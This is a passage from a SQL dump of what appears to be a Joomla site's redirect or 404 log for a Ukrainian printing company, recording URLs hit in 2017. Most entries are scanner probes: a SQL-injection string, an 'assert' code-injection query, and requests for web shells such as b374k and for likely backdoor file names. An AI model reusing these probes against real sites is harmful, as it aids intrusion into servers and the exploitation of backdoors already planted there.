00:00:00',301),(9737,'http://ekvatorprint.com.ua/templates/j2template/index.html',NULL,'http://ekvatorprint.com.ua/templates/j2template/index.html','',1,0,'2017-05-22 13:17:01','0000-00-00 00:00:00',301),(9738,'http://ekvatorprint.com.ua/db_backup/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 13:44:39','0000-00-00 00:00:00',301),(9739,'http://ekvatorprint.com.ua/wp-blog-config.php',NULL,'','',2,0,'2017-05-22 16:32:58','0000-00-00 00:00:00',301),(9740,'http://ekvatorprint.com.ua/backupdata/',NULL,'http://ekvatorprint.com.ua/','',2,0,'2017-05-22 18:28:12','0000-00-00 00:00:00',301),(9741,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml\'',NULL,'','',2,0,'2017-05-22 18:55:35','0000-00-00 00:00:00',301),(9742,'http://ekvatorprint.com.ua/administrator/components/com_admin/views/help/tmpl/default.xml',NULL,'','',1,0,'2017-05-22 19:22:31','0000-00-00 00:00:00',301),(9743,'http://ekvatorprint.com.ua/yt.php',NULL,'','',9,0,'2017-05-23 11:39:21','0000-00-00 00:00:00',301),(9744,'http://ekvatorprint.com.ua/show.php?check=1',NULL,'','',3,0,'2017-05-24 07:18:34','0000-00-00 00:00:00',301),(9745,'http://ekvatorprint.com.ua/, ничего не надо, мы вам позвоним и т.д.',NULL,'','',2,0,'2017-05-24 14:29:01','0000-00-00 00:00:00',301),(9746,'http://ekvatorprint.com.ua/administrator/components/com_djcatalog2/views/producer/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_djcatalog2/views/producer/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:22','0000-00-00 00:00:00',301),(9747,'http://ekvatorprint.com.ua/administrator/components/com_djcatalog2/views/items/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_djcatalog2/views/items/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:22','0000-00-00 00:00:00',301),(9748,'http://ekvatorprint.com.ua/administrator/components/com_falang/views/translate/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_falang/views/translate/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9749,'http://ekvatorprint.com.ua/administrator/a1.php',NULL,'http://ekvatorprint.com.ua/administrator/a1.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9750,'http://ekvatorprint.com.ua/administrator/components/com_admin/sql/others/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/sql/others/config.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9751,'http://ekvatorprint.com.ua/administrator/components/com_config/helper/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_config/helper/backup.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9752,'http://ekvatorprint.com.ua/administrator/components/com_checkin/views/checkin/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_checkin/views/checkin/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9753,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/update.php','',1,0,'2017-05-24 14:54:23','0000-00-00 00:00:00',301),(9754,'http://ekvatorprint.com.ua/administrator/components/com_jcomments/views/smilies/confiq.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jcomments/views/smilies/confiq.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9755,'http://ekvatorprint.com.ua/administrator/components/com_languages/controllers/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/controllers/backup.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9756,'http://ekvatorprint.com.ua/administrator/components/com_k2/lib/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_k2/lib/backup.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9757,'http://ekvatorprint.com.ua/administrator/components/com_kunena/language/et-ee/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_kunena/language/et-ee/update.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9758,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/extrafields/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/extrafields/update.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9759,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/backup.php','',1,0,'2017-05-24 14:54:43','0000-00-00 00:00:00',301),(9760,'http://ekvatorprint.com.ua/administrator/components/com_joomgallery/views/move/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomgallery/views/move/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9761,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/default/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/default/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9762,'http://ekvatorprint.com.ua/administrator/components/com_jce/views/config/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jce/views/config/backup.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9763,'http://ekvatorprint.com.ua/administrator/components/com_jce/media/img/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jce/media/img/config.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9764,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filters/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filters/update.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9765,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filter/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/filter/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9766,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/statistics/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/statistics/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9767,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9768,'http://ekvatorprint.com.ua/administrator/components/com_jhackguard/sql/updates/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jhackguard/sql/updates/config.php','',1,0,'2017-05-24 14:54:44','0000-00-00 00:00:00',301),(9769,'http://ekvatorprint.com.ua/administrator/components/com_poll/mod_araticlws.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_poll/mod_araticlws.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9770,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/config.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9771,'http://ekvatorprint.com.ua/administrator/components/com_login/models/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_login/models/backup.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9772,'http://ekvatorprint.com.ua/administrator/components/com_messages/views/messages/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_messages/views/messages/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9773,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tags/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tags/config.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9774,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/backup.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9775,'http://ekvatorprint.com.ua/administrator/components/com_users/views/debuggroup/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/views/debuggroup/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9776,'http://ekvatorprint.com.ua/administrator/d.php',NULL,'http://ekvatorprint.com.ua/administrator/d.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9777,'http://ekvatorprint.com.ua/administrator/components/com_menus/tables/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_menus/tables/backup.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9778,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/source/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/source/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:52','0000-00-00 00:00:00',301),(9779,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/tmpl/htaccess.php','',1,0,'2017-05-24 14:54:53','0000-00-00 00:00:00',301),(9780,'http://ekvatorprint.com.ua/administrator/components/com_templates/models/forms/update.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/models/forms/update.php','',1,0,'2017-05-24 14:54:53','0000-00-00 00:00:00',301),(9781,'http://ekvatorprint.com.ua/administrator/components/com_rsform/assets/codemirror/mode/coffeescript/setup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_rsform/assets/codemirror/mode/coffeescript/setup.php','',1,0,'2017-05-24 14:54:53','0000-00-00 00:00:00',301),(9782,'http://ekvatorprint.com.ua/administrator/templates/sysadmin2/images/header/_notes/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/sysadmin2/images/header/_notes/htaccess.php','',1,0,'2017-05-24 14:55:21','0000-00-00 00:00:00',301),(9783,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/profile/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_admin/profile/htaccess.php','',6,0,'2017-05-24 14:55:21','0000-00-00 00:00:00',301),(9784,'http://ekvatorprint.com.ua/administrator/modules/mod_submenu/tmpl/context.php.',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_submenu/tmpl/context.php.','',1,0,'2017-05-24 14:55:21','0000-00-00 00:00:00',301),(9785,'http://ekvatorprint.com.ua/administrator/report.php',NULL,'http://ekvatorprint.com.ua/administrator/report.php','',1,0,'2017-05-24 14:55:21','0000-00-00 00:00:00',301),(9786,'http://ekvatorprint.com.ua/administrator/templates/hathor/less/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/less/backup.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9787,'http://ekvatorprint.com.ua/administrator/modules/mod_submenu/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_submenu/tmpl/backup.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9788,'http://ekvatorprint.com.ua/administrator/templates/hathor/images/header/update.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/images/header/update.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9789,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_menus/menu/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_menus/menu/backup.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9790,'http://ekvatorprint.com.ua/administrator/modules/mod_menu/tmpl/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/modules/mod_menu/tmpl/backup.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9791,'http://ekvatorprint.com.ua/administrator/templates/hathor/images/menu/opts.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/images/menu/opts.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9792,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/debuggroup/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_users/debuggroup/htaccess.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9793,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/discover/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/discover/htaccess.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9794,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_languages/languages/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_languages/languages/htaccess.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9795,'http://ekvatorprint.com.ua/administrator/templates/system/images/569a462495f96.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/system/images/569a462495f96.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9796,'http://ekvatorprint.com.ua/administrator/templates/hathor/language/en-gb/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/language/en-gb/backup.php','',1,0,'2017-05-24 14:55:22','0000-00-00 00:00:00',301),(9797,'http://ekvatorprint.com.ua/android/zip_asdasd.php',NULL,'http://ekvatorprint.com.ua/android/zip_asdasd.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9798,'http://ekvatorprint.com.ua/bk/administrator/components/com_admin/postinstall/update.php',NULL,'http://ekvatorprint.com.ua/bk/administrator/components/com_admin/postinstall/update.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9799,'http://ekvatorprint.com.ua/components/com_search/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_search/views/index.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9800,'http://ekvatorprint.com.ua/cloud/assets/a8c30c3b/autocomplete/xcache.php',NULL,'http://ekvatorprint.com.ua/cloud/assets/a8c30c3b/autocomplete/xcache.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9801,'http://ekvatorprint.com.ua/components/com_finder/views/search/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_finder/views/search/tmpl/config.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9802,'http://ekvatorprint.com.ua/components/com_attachments/views/update/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_attachments/views/update/backup.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9803,'http://ekvatorprint.com.ua/beta/administrator/templates/isis/less/config.php',NULL,'http://ekvatorprint.com.ua/beta/administrator/templates/isis/less/config.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9804,'http://ekvatorprint.com.ua/category.php',NULL,'http://ekvatorprint.com.ua/category.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9805,'http://ekvatorprint.com.ua/components/com_tz_portfolio/views/users/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_tz_portfolio/views/users/backup.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9806,'http://ekvatorprint.com.ua/cloud/resources/font-awesome/css/opcaches.php',NULL,'http://ekvatorprint.com.ua/cloud/resources/font-awesome/css/opcaches.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9807,'http://ekvatorprint.com.ua/bk/libraries/joomla/crypt/password/config.php',NULL,'http://ekvatorprint.com.ua/bk/libraries/joomla/crypt/password/config.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9808,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/filemanager/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/filemanager/htaccess.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9809,'http://ekvatorprint.com.ua/components/com_contact/css.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/css.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9810,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/autolink/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/autolink/htaccess.php','',1,0,'2017-05-24 14:55:27','0000-00-00 00:00:00',301),(9811,'http://ekvatorprint.com.ua/components/com_banners/opcaches.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/opcaches.php','',1,0,'2017-05-24 14:55:28','0000-00-00 00:00:00',301),(9812,'http://ekvatorprint.com.ua/images/mosimage.php',NULL,'http://ekvatorprint.com.ua/images/mosimage.php','',1,0,'2017-05-24 14:55:48','0000-00-00 00:00:00',301),(9813,'http://ekvatorprint.com.ua/d/images/gallery/getservbyport.php.',NULL,'http://ekvatorprint.com.ua/d/images/gallery/getservbyport.php.','',1,0,'2017-05-24 14:55:48','0000-00-00 00:00:00',301),(9814,'http://ekvatorprint.com.ua/components/com_weblinks/views/weblink/tmpl/xml_rpc.class.php.',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/views/weblink/tmpl/xml_rpc.class.php.','',1,0,'2017-05-24 14:55:48','0000-00-00 00:00:00',301),(9815,'http://ekvatorprint.com.ua/files/docs/manual/itv/xcache.php',NULL,'http://ekvatorprint.com.ua/files/docs/manual/itv/xcache.php','',1,0,'2017-05-24 14:55:49','0000-00-00 00:00:00',301),(9816,'http://ekvatorprint.com.ua/custom/2013/10-08/videos/backup.php',NULL,'http://ekvatorprint.com.ua/custom/2013/10-08/videos/backup.php','',1,0,'2017-05-24 14:55:49','0000-00-00 00:00:00',301),(9817,'http://ekvatorprint.com.ua/images/5673775162454.php',NULL,'http://ekvatorprint.com.ua/images/5673775162454.php','',1,0,'2017-05-24 14:55:49','0000-00-00 00:00:00',301),(9818,'http://ekvatorprint.com.ua/error-files/modules/mod_imagestyle/mod_imagestyle.php',NULL,'http://ekvatorprint.com.ua/error-files/modules/mod_imagestyle/mod_imagestyle.php','',1,0,'2017-05-24 14:55:49','0000-00-00 00:00:00',301),(9819,'http://ekvatorprint.com.ua/images/osproperty/properties/25/joomla_style.php.',NULL,'http://ekvatorprint.com.ua/images/osproperty/properties/25/joomla_style.php.','',1,0,'2017-05-24 14:55:49','0000-00-00 00:00:00',301),(9820,'http://ekvatorprint.com.ua/images/osproperty/properties/29/joomla_rss.php.',NULL,'http://ekvatorprint.com.ua/images/osproperty/properties/29/joomla_rss.php.','',1,0,'2017-05-24 14:55:50','0000-00-00 00:00:00',301),(9821,'http://ekvatorprint.com.ua/images/joomgallery/details/2007_10/schuetzenfest_32/samstag_morgen_40/htaccess.php',NULL,'http://ekvatorprint.com.ua/images/joomgallery/details/2007_10/schuetzenfest_32/samstag_morgen_40/htaccess.php','',1,0,'2017-05-24 14:55:50','0000-00-00 00:00:00',301),(9822,'http://ekvatorprint.com.ua/components/com_xmap/views/xml/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_xmap/views/xml/backup.php','',1,0,'2017-05-24 14:55:50','0000-00-00 00:00:00',301),(9823,'http://ekvatorprint.com.ua/components/com_users/views/registration/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/registration/tmpl/config.php','',1,0,'2017-05-24 14:55:50','0000-00-00 00:00:00',301),(9824,'http://ekvatorprint.com.ua/components/com_weblinks/helpers/htaccess.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/helpers/htaccess.php','',1,0,'2017-05-24 14:55:50','0000-00-00 00:00:00',301),(9825,'http://ekvatorprint.com.ua/components/com_weblinks/views/weblink/tmpl/user-info.php.',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/views/weblink/tmpl/user-info.php.','',1,0,'2017-05-24 14:55:51','0000-00-00 00:00:00',301),(9826,'http://ekvatorprint.com.ua/modules/mod_arateiclws/mod_arateiclws.php',NULL,'http://ekvatorprint.com.ua/modules/mod_arateiclws/mod_arateiclws.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9827,'http://ekvatorprint.com.ua/modules/mod_rokdownloads_recent_updates/media-views-rtl.php',NULL,'http://ekvatorprint.com.ua/modules/mod_rokdownloads_recent_updates/media-views-rtl.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9828,'http://ekvatorprint.com.ua/images/yootheme/demo/ruby/backup.php',NULL,'http://ekvatorprint.com.ua/images/yootheme/demo/ruby/backup.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9829,'http://ekvatorprint.com.ua/libraries/vendor/ircmaxell/password-compat/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/vendor/ircmaxell/password-compat/backup.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9830,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php',NULL,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/ws0.php','',2,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9831,'http://ekvatorprint.com.ua/modules/mod_slideshowck/images/slides2/update.php',NULL,'http://ekvatorprint.com.ua/modules/mod_slideshowck/images/slides2/update.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9832,'http://ekvatorprint.com.ua/images/products/xxxx-smile.php',NULL,'http://ekvatorprint.com.ua/images/products/xxxx-smile.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9833,'http://ekvatorprint.com.ua/layouts/joomla/editors/buttons/backup.php',NULL,'http://ekvatorprint.com.ua/layouts/joomla/editors/buttons/backup.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9834,'http://ekvatorprint.com.ua/libraries/gantry/assets/jui/img/update.php',NULL,'http://ekvatorprint.com.ua/libraries/gantry/assets/jui/img/update.php','',1,0,'2017-05-24 14:55:59','0000-00-00 00:00:00',301),(9835,'http://ekvatorprint.com.ua/inflataboxes.com-oldwebsite-backup/administrator/components/com_menus/models/forms/update.php',NULL,'http://ekvatorprint.com.ua/inflataboxes.com-oldwebsite-backup/administrator/components/com_menus/models/forms/update.php','',1,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9836,'http://ekvatorprint.com.ua/libraries/joomla/twrp.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/twrp.php','',1,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9837,'http://ekvatorprint.com.ua/libraries/vendor/leafo/lessphp/backup.php',NULL,'http://ekvatorprint.com.ua/libraries/vendor/leafo/lessphp/backup.php','',1,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9838,'http://ekvatorprint.com.ua/includes/d.php',NULL,'http://ekvatorprint.com.ua/includes/d.php','',3,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9839,'http://ekvatorprint.com.ua/libraries/cegcore/extensions/editors/assets/config.php',NULL,'http://ekvatorprint.com.ua/libraries/cegcore/extensions/editors/assets/config.php','',1,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9840,'http://ekvatorprint.com.ua/kebaramy/templates/beez5/index.php',NULL,'http://ekvatorprint.com.ua/kebaramy/templates/beez5/index.php','',1,0,'2017-05-24 14:56:00','0000-00-00 00:00:00',301),(9841,'http://ekvatorprint.com.ua/modules/mod_sp_countdown/assets/css/backup.php',NULL,'http://ekvatorprint.com.ua/modules/mod_sp_countdown/assets/css/backup.php','',2,0,'2017-05-24 14:56:19','0000-00-00 00:00:00',301),(9842,'http://ekvatorprint.com.ua/writebab.php',NULL,'','',9,0,'2017-05-25 12:10:41','0000-00-00 00:00:00',301),(9843,'http://ekvatorprint.com.ua/trackback.php',NULL,'','',3,0,'2017-05-26 17:56:37','0000-00-00 00:00:00',301),(9844,'http://ekvatorprint.com.ua/home/setup-config.php?step=1',NULL,'','',1,0,'2017-05-26 19:55:50','0000-00-00 00:00:00',301),(9845,'http://ekvatorprint.com.ua/pols.php',NULL,'','',3,0,'2017-05-27 02:34:44','0000-00-00 00:00:00',301),(9846,'http://ekvatorprint.com.ua/new/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-27 08:44:58','0000-00-00 00:00:00',301),(9847,'http://ekvatorprint.com.ua/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-27 14:04:44','0000-00-00 00:00:00',301),(9848,'http://ekvatorprint.com.ua/wp-content/uploads/51217766.php',NULL,'','',14,0,'2017-05-27 16:24:17','0000-00-00 00:00:00',301),(9849,'http://ekvatorprint.com.ua/administrator/language/en-GB/en.php',NULL,'','',2,0,'2017-05-27 20:02:11','0000-00-00 00:00:00',301),(9850,'http://ekvatorprint.com.ua/assets/images/iran78fzfzz.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-05-28 14:54:47','0000-00-00 00:00:00',301),(9851,'http://ekvatorprint.com.ua/assets/b374k-2.8.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-05-28 16:31:24','0000-00-00 00:00:00',301),(9852,'http://ekvatorprint.com.ua/wp-content/b374k-2.8.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-05-28 16:37:16','0000-00-00 00:00:00',301),(9853,'http://ekvatorprint.com.ua/cms/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2017-05-29 04:41:23','0000-00-00 00:00:00',301),(9854,'http://ekvatorprint.com.ua/js/tools.js',NULL,'','',1,0,'2017-05-29 10:11:21','0000-00-00 00:00:00',301),(9855,'http://ekvatorprint.com.ua/trebovania',NULL,'','',1,0,'2017-05-30 20:07:48','0000-00-00 00:00:00',301),(9856,'http://ekvatorprint.com.ua/libraries/joomla/implement.php',NULL,'http://ekvatorprint.com.ua/','',16,0,'2017-05-30 23:27:17','0000-00-00 00:00:00',301),(9857,'http://ekvatorprint.com.ua/printing-on-an-awning',NULL,'','',1,0,'2017-05-31 07:03:29','0000-00-00 00:00:00',301),(9858,'http://ekvatorprint.com.ua/printing-on-an-awningё',NULL,'','',1,0,'2017-05-31 07:03:30','0000-00-00 00:00:00',301),(9859,'http://ekvatorprint.com.ua/printing-on-an-awningС‘',NULL,'','',1,0,'2017-05-31 07:03:31','0000-00-00 00:00:00',301),(9860,'http://ekvatorprint.com.ua/reade.php',NULL,'','',3,0,'2017-05-31 18:34:36','0000-00-00 00:00:00',301),(9861,'http://ekvatorprint.com.ua/versions.php',NULL,'','',9,0,'2017-06-01 01:59:18','0000-00-00 00:00:00',301),(9862,'http://ekvatorprint.com.ua/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',6,0,'2017-06-01 05:52:32','0000-00-00 00:00:00',301),(9863,'http://ekvatorprint.com.ua/images/defau1t.php',NULL,'','',8,0,'2017-06-01 07:10:20','0000-00-00 00:00:00',301),(9864,'http://ekvatorprint.com.ua/administrator/content-comments.min.php?good=1',NULL,'','',4,0,'2017-06-01 07:49:10','0000-00-00 00:00:00',301),(9865,'http://ekvatorprint.com.ua/administrator/templates/isis/ext.php',NULL,'','',4,0,'2017-06-01 09:08:38','0000-00-00 00:00:00',301),(9866,'http://ekvatorprint.com.ua/axmlprc.php',NULL,'','',3,0,'2017-06-01 13:35:32','0000-00-00 00:00:00',301),(9867,'http://ekvatorprint.com.ua/wp-conde.php',NULL,'','',5,0,'2017-06-02 05:26:34','0000-00-00 00:00:00',301),(9868,'http://ekvatorprint.com.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',8,0,'2017-06-02 08:58:48','0000-00-00 00:00:00',301),(9869,'http://ekvatorprint.com.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',9,0,'2017-06-02 09:36:16','0000-00-00 00:00:00',301),(9870,'http://ekvatorprint.com.ua/templates/protostar/js/templateDetails.php',NULL,'','',4,0,'2017-06-02 10:15:18','0000-00-00 00:00:00',301),(9871,'http://ekvatorprint.com.ua/libraries/modules.php',NULL,'','',4,0,'2017-06-02 10:52:51','0000-00-00 00:00:00',301),(9872,'http://ekvatorprint.com.ua/modules/modules.php',NULL,'','',5,0,'2017-06-02 11:30:18','0000-00-00 00:00:00',301),(9873,'http://ekvatorprint.com.ua/plugins/modules.php',NULL,'','',7,0,'2017-06-02 12:07:53','0000-00-00 00:00:00',301),(9874,'http://ekvatorprint.com.ua/components/modules.php',NULL,'','',7,0,'2017-06-02 12:46:04','0000-00-00 00:00:00',301),(9875,'http://ekvatorprint.com.ua/images/CONFIGURATIONS.php',NULL,'','',2,0,'2017-06-02 20:45:03','0000-00-00 00:00:00',301),(9876,'http://ekvatorprint.com.ua/images/READMES.php',NULL,'','',5,0,'2017-06-03 04:24:00','0000-00-00 00:00:00',301),(9877,'http://ekvatorprint.com.ua/gtde.php',NULL,'','',4,0,'2017-06-03 17:33:36','0000-00-00 00:00:00',301),(9878,'http://ekvatorprint.com.ua/banner-printingparameter=1&gclid=TeSter-123.',NULL,'','',1,0,'2017-06-04 13:58:48','0000-00-00 00:00:00',301),(9879,'http://ekvatorprint.com.ua/[k[l',NULL,'','',1,0,'2017-06-04 18:16:46','0000-00-00 00:00:00',301),(9880,'http://ekvatorprint.com.ua/jm-ajax/upload_file/',NULL,'','',7,0,'2017-06-05 01:00:35','0000-00-00 